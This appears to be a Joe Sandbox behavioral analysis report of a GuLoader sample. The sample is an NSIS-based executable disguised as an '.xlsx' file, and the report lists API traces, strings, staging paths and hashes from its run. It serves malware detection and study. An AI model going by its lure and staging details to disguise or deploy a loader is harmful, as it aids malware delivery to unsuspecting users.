Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:05:05
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
Imagebase:	0x400000
File size:	530'598 bytes
MD5 hash:	321A9608E5BF03BF63F4574D0DF1A380
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.4016458454.0000000004A43000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	20.1%
Dynamic/Decrypted Code Coverage:	13.7%
Signature Coverage:	19%
Total number of Nodes:	1519
Total number of Limit Nodes:	41

Executed Functions

Function 0040335A Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 383
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403379
SetErrorMode.KERNELBASE(00008001), ref: 00403384
OleInitialize.OLE32(00000000), ref: 0040338B

Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 004062CF
Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0

SHGetFileInfoW.SHELL32(004206A8,00000000,?,?,00000000), ref: 004033B3

Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,?,004033C8,00428200,NSIS Error), ref: 00405F55

GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",00000000), ref: 004033DB
CharNextW.USER32(00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",?), ref: 00403403
GetTempPathW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040353B
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040354C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403558
GetTempPathW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040356C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403574
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403585
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040358D
DeleteFileW.KERNELBASE(1033), ref: 004035A1
OleUninitialize.OLE32(?), ref: 0040366C
ExitProcess.KERNEL32 ref: 0040368C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",00000000,?), ref: 00403698
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",00000000,?), ref: 004036A4
CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004036B0
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004036B7
DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
CopyFileW.KERNEL32(C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,0041FEA8,00000001), ref: 00403725
CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
GetCurrentProcess.KERNEL32(?,00000006,00000006,00000005,?), ref: 004037AC
ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
ExitProcess.KERNEL32 ref: 00403827

Strings

SeShutdownPrivilege, xrefs: 004037BE
1033, xrefs: 0040359C
\Temp, xrefs: 00403552
"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", xrefs: 004033CE, 004033D4, 004033EB, 004035C9
Error launching installer, xrefs: 00403623
~nsu.tmp, xrefs: 00403692
C:\Users\user\Desktop, xrefs: 0040369D, 004036A2, 004036C6
TMP, xrefs: 00403588
TEMP, xrefs: 00403580
C:\Users\user\AppData\Local\Temp\, xrefs: 00403530, 00403535, 0040354B, 00403557, 00403566, 00403573, 0040357F, 00403587, 00403697, 004036A3, 004036AF, 004036B6, 00403767
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040336D
C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe, xrefs: 00403720
NSIS Error, xrefs: 004033B9
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy, xrefs: 00403520, 0040363E, 004036BD, 004036C7
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling, xrefs: 00403649
Low, xrefs: 0040356E

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling$C:\Users\user\Desktop$C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
API String ID: 4107622049-916649053
Opcode ID: 6de4bcbb11031c879ee3deef6446ea1c2af14a1e5999aba2ca839f213c8af4a3
Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
Opcode Fuzzy Hash: 6de4bcbb11031c879ee3deef6446ea1c2af14a1e5999aba2ca839f213c8af4a3
Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E

Function 00405331 Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405390
GetDlgItem.USER32(?,000003EE), ref: 0040539F
GetClientRect.USER32(?,?), ref: 004053DC
GetSystemMetrics.USER32(00000015), ref: 004053E4
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
ShowWindow.USER32(?,?), ref: 00405480
GetDlgItem.USER32(?,?), ref: 004054A1
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
GetDlgItem.USER32(?,?), ref: 004053AE

Part of subcall function 004041CF: SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD

GetDlgItem.USER32(?,?), ref: 004054F3
CreateThread.KERNELBASE(00000000,00000000,Function_000052C5,00000000), ref: 00405501
CloseHandle.KERNELBASE(00000000), ref: 00405508
ShowWindow.USER32(00000000), ref: 0040552C
ShowWindow.USER32(?,?), ref: 00405531
ShowWindow.USER32(?), ref: 0040557B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
CreatePopupMenu.USER32 ref: 004055C0
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
GetWindowRect.USER32(?,?), ref: 004055F4
TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 0040560D
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
OpenClipboard.USER32(00000000), ref: 00405655
EmptyClipboard.USER32 ref: 0040565B
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
GlobalLock.KERNEL32(00000000), ref: 00405671
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
GlobalUnlock.KERNEL32(00000000), ref: 004056A5
SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
CloseClipboard.USER32 ref: 004056B6

Strings

&B, xrefs: 00405621
{, xrefs: 00405599
4Ct, xrefs: 00405585

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: 4Ct${$&B
API String ID: 590372296-1569179724
Opcode ID: c0326886d2318a88a78635f0047d6771461a0522e5dc035da93f56fe400bf1bd
Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
Opcode Fuzzy Hash: c0326886d2318a88a78635f0047d6771461a0522e5dc035da93f56fe400bf1bd
Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69

Function 00405F6A Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000), ref: 0040602D
GetSystemDirectoryW.KERNEL32(Call,?), ref: 004060AB
GetWindowsDirectoryW.KERNEL32(Call,?), ref: 004060BE
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406108
CoTaskMemFree.OLE32(?), ref: 00406113
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000), ref: 00406191

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406079
Call, xrefs: 00405F94, 00406074, 00406095, 004060AA, 004060BD, 004060D9, 00406104, 00406136, 0040613C, 00406156, 0040616A, 0040618A, 00406190, 0040619C, 004061CF
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406131
Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll, xrefs: 00405F8F

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-878914946
Opcode ID: 89a2242da9b4bbc605b67f2f009b40da19baa1a0849ba18391ac33b03fc270f4
Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
Opcode Fuzzy Hash: 89a2242da9b4bbc605b67f2f009b40da19baa1a0849ba18391ac33b03fc270f4
Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E

Function 004057D0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 004057F9
lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 00405841
lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 00405864
lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 0040586A
FindFirstFileW.KERNELBASE(004246F0,?,?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 0040587A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
FindClose.KERNEL32(00000000), ref: 00405929

Strings

\*.*, xrefs: 0040583B
"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", xrefs: 004057D9
C:\Users\user\AppData\Local\Temp\, xrefs: 004057DE

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-707783126
Opcode ID: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
Opcode Fuzzy Hash: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E

Function 0040659D Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44

Function 0040628B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,?,?,76232EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,76232EE0), ref: 00406296
FindClose.KERNEL32(00000000), ref: 004062A2

Strings

8WB, xrefs: 0040628C

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 8WB
API String ID: 2295610775-3088156181
Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D

Function 004062B2 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 004062CF
GetProcAddress.KERNEL32(00000000,?), ref: 004062E0

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction ID: 6db28869a22d2b590e25977263656b8717a92efcd7e963286bbc5c179789795b
Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction Fuzzy Hash: F2E0C236E0C120ABC7225B209E4896B73ACAFE9651305043EF506F6280C774EC229BE9

Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,?), ref: 004020BD

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling, xrefs: 004020FB

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling
API String ID: 542301482-4070182260
Opcode ID: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
Instruction ID: 3f054c58238b343a02ca2e9776fd111f4d7efc3a485c04e582207c90830a0c16
Opcode Fuzzy Hash: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
Instruction Fuzzy Hash: BC414F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54

Function 00402C44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
Instruction ID: 330ade1cb5eaca6017f72c73cdc8309555cb727b7ded56d963bee508ab8c6b31
Opcode Fuzzy Hash: b8abee58de6a0be5eb9c5c198a3cab6a4ba6a66a5c1950069b28e2d3a299ffdb
Instruction Fuzzy Hash: A2E04676290108BADB00EFA4EE4AF9A77ECEB18704F008421B608E6091C774E9408BA8

Function 00403CC2 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
ShowWindow.USER32(?), ref: 00403D1B
DestroyWindow.USER32 ref: 00403D2F
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
GetDlgItem.USER32(?,?), ref: 00403D6C
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
IsWindowEnabled.USER32(00000000), ref: 00403D87
GetDlgItem.USER32(?,00000001), ref: 00403E35
GetDlgItem.USER32(?,00000002), ref: 00403E3F
SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
GetDlgItem.USER32(?,00000003), ref: 00403F50
ShowWindow.USER32(00000000,?), ref: 00403F71
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
EnableWindow.USER32(?,?), ref: 00403F9E
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
EnableMenuItem.USER32(00000000), ref: 00403FBB
SendMessageW.USER32(?,?,00000000,00000001), ref: 00403FD3
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
SetWindowTextW.USER32(?,004226E8), ref: 00404023
